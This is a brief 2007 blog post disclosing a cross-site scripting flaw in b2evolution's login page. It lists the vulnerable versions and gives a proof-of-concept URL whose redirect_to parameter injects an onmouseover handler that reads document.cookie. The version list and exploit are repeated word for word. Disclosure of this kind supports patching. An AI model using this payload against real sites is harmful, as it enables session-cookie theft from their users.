Monday, February 26, 2007
XSS in b2Evolution
b2evolution is "a free blog tool for the next generation of blogs". A cross site scripting vulnerability in b2Evolution's login page allows attackers to insert arbitrary HTML and/or JavaScript into the login page.
Vulnerable versions:
0.9.0.12, 0.9.1, 1.6-alpha, 1.8.6, 1.9.1-beta
Exploit:
http://[site.com]/htsrv/login.php?redirect_to=%22%20onmouseover=%22
alert(document.cookie) <--- in 1 string.
Vulnerable versions:
0.9.0.12, 0.9.1, 1.6-alpha, 1.8.6, 1.9.1-beta
Exploit:
http://[site.com]/htsrv/login.php?redirect_to=%22%20onmouseover=%22
alert(document.cookie) <--- in 1 string.